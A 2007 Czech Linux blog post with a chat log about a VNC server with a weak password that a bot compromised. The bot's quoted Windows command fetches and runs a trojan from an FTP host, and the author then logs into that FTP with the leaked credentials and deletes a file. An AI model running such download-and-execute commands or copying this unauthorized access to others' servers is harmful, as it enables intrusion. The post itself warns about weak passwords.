Portál AbcLinuxu, 3. května 2025 11:08
Jak je důležité mít silná hesla - příběh ze života
8.3.2007 22:18
| Přečteno: 2603×
| Linux
| poslední úprava: 8.3.2007 22:20
Jeden známej si nainstaloval Ubuntu a já ač fedorista se mu snažil
jako nováčkovi některé věci vysvětlit a ukázat. Vysvětlil jsem mu jak
si pustit VNC server a připojil se přes něj k němu. Po asi 2 hodinách
vysvětlování jsem se odpojil. Pokračovalo to přibližně takhle (na konci happy end a lehké potrápení záškodníka):
(20:28:31) Bbbbb: jo dobre ja to zkusim a divej co mi to zacalo vypisovat terminalu kdyz ses
odhlasil:
_systemroot_<system#@<cmd.exe
bash: system#@: No such file or directory
user@ubuntu:~$ cmd {c echo open ftp.hypermart.net @! .. ik 7echo user joh joh .. ik 7echo binary
.. ik 7echo get abc.exe .. ik 7echo bye .
. ik 7ftp /n /v /s>ik 7del ik 7abc.exe 7exit
bash: cmd: command not found
user@ubuntu:~$
(20:28:47) Bbbbb: zacalo se to tam samo psat jako kdyby to tam nekdo psal
(20:30:03) Jirka: to je teda docela zmatek !?!
(20:30:23) Jirka: to je windowsovy prikaz
(20:30:31) Bbbbb: no vubec sem nechapal...fakt jako kdybys to tam psal ty...
(20:30:43) Jirka: na me to nehodis ja jedu z linuxu 
(20:31:14) Bbbbb: se mi tam asi nekdo vrtal :/
(20:31:19) Jirka: ze by te nekdo nejak naboril?!? to se mi nechce verit
(20:31:34) Jirka: ale jestli mas nejaky hodne jednoduchy heslo na roota....
(20:32:23) Jirka: zkus netstat -n|less
(20:32:42) Bbbbb: no na roota mam jednoduchy.... 5 cisel ale to vypadalo jako kdyby se
tam ekdo rpipojil pres to vns nebo jak se tomu rika...
(20:32:50) Jirka: ze zacatky jsou internetova spojeni
(20:33:07) Jirka: sleduj co je v Foreign Address
(20:33:26) Bbbbb:
tcp 0 0 192.168.1.98:40750 64.12.25.101:5190 SPOJENO
tcp 0 0 192.168.1.98:46621 64.12.29.68:5190 SPOJENO
(20:34:30) Bbbbb: to jsou dve ruzy IP....je nejaka tvoje?
(20:35:02) Jirka: ja mam jinou
(20:35:44) Bbbbb: tak to se nekdo na me pripojil teda ...
(20:36:17) Jirka: divam se do /etc/services na port 5190 a vypada to na icq
(20:36:24) Jirka: takze to bude asi v poradku
(20:36:55) Bbbbb: aaaha...tak to jo . o ale stejne nechapu co se to tam zacalo vypisovat....
no je to jedno..
(20:37:19) Jirka: no v kazdym pripade davat poradny hesla
(20:37:31) Jirka: jeste se muzes podivat do /var/log/
(20:37:35) Bbbbb: jako na root?
(20:37:38) Jirka: je tam spousta souboru
(20:37:46) Jirka: poradny hesla na vsechno
(20:38:00) Jirka: i kdyz ty roboti utoci na znama konta
(20:38:20) Bbbbb: a co v tom /var/log
(20:38:21) Jirka: tezko se nekdo bude snazit prihlasit na to tvoje jmeno uzivatele
(20:39:00) Jirka: je tam urcite messages a mozna secure
(20:39:14) Jirka: melo by tam byt kdo se kdy hlasil pres ssh...
(20:39:46) Bbbbb: nj...ale nechapu kdo mi tam zacal psat prikazy:
_systemroot_<system#@<cmd.exe
cmd {c echo open ftp.hypermart.net @! .. ik 7echo user joh joh .. ik 7echo binary .. ik
7echo get abc.exe .. ik 7echo bye .. ik 7ftp /n /v /s>ik 7del ik 7abc.exe 7exit
(20:44:52) Jirka: tak jsem trochu premyslel
(20:45:22) Jirka: a myslim se nejaky robot ocuchval otevrene porty kde bezi vnc
(20:45:29) Jirka: a zkusil se prihlasit
(20:45:53) Jirka: protoze tam bylo hodne primitivni heslo 12345, tak se mu to podarilo
(20:46:32) Jirka: nastesti prepokladal, ze se prihlasil na windowsy (je to jen blbej robot)
a snazil se spustit tehle prikaz
(20:46:41) Bbbbb: smejd...a co to jako je za roboty? co maj delat?
(20:46:57) Jirka: tedy stahnout z toho ftp nejakyho trojana a spustit ho
(20:47:15) Jirka: schalne se tam mkrnu 
(20:47:20) Bbbbb: v tomhletom je linux asi bezpecnejsi ze
(20:48:20) Jirka: $ ftp ftp.hypermart.net
Connected to ftp.hypermart.net.
220 FTP Server ready
500 AUTH not understood
500 AUTH not understood
KERBEROS_V4 rejected as an authentication type
Name (ftp.hypermart.net:jirka): joh
331 Password required for joh.
Password:
230 User joh logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
227 Entering Passive Mode (38,113,1,151,148,36)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 joh www 52224 Mar 8 07:29 abc.exe
-rw-r--r-- 1 joh www 302303 Mar 5 03:02 light.exe
-rw-r--r-- 1 joh www 36700 Mar 6 03:16 spoolsq.exe
-rw-r--r-- 1 joh www 36714 Mar 5 03:02 vncfull.exe
226 Transfer complete.
ftp>
(20:48:33) Bbbbb: co mi doporucujes za ftp klienta
(20:48:33) Jirka: jak jsem predpokladal ma to tam
(20:49:06) Jirka: ted jsem ho smejda vyradil 
(20:49:09) Jirka: ftp> del abc.exe
250 DELE command successful
ftp> dir
227 Entering Passive Mode (38,113,1,151,207,228)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 joh www 302303 Mar 5 03:02 light.exe
-rw-r--r-- 1 joh www 36700 Mar 6 03:16 spoolsq.exe
-rw-r--r-- 1 joh www 36714 Mar 5 03:02 vncfull.exe
226 Transfer complete.
ftp>
(20:49:37) Jirka: maznul jsem mu to abc.exe co se snazi kopiravt na ty cizi stroje
(20:49:54) Bbbbb: a jak jsi zjistil jmeno a heslo?
(20:50:08) Bbbbb: to ftp je primo aplikace kterou bych tu mel mit taky ze
(20:50:10) Jirka: je to na tom radku co jsi mi poslal
(20:50:13) Jirka: jo
(20:50:44) Bbbbb: user je joh a heslo taky joh?
(20:50:48) Jirka: jo
(20:51:53) Bbbbb: to jsou mi veci....fakt zajimavy
Tiskni
Sdílej:
Komentáře
Vložit další komentář
9.3.2007 01:01
trekker.dk | skóre: 72
Re: Jak je důležité mít silná hesla - příběh ze života
9.3.2007 05:55
wo | skóre: 2
| blog:
wo
Re: Jak je důležité mít silná hesla - příběh ze života
9.3.2007 06:38
David Watzke | skóre: 74
| blog:
Blog...
| Praha
Re: Jak je důležité mít silná hesla - příběh ze života
9.3.2007 08:18
xvasek | skóre: 21
| blog:
| Zlín
Re: Jak je důležité mít silná hesla - příběh ze života
9.3.2007 08:35
LuděkS | skóre: 31
| blog:
publish
| Liberec
Re: Jak je důležité mít silná hesla - příběh ze života
Založit nové vlákno •
Nahoru
ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.
9.3.2007 06:38
9.3.2007 08:44
9.3.2007 11:14
9.3.2007 08:45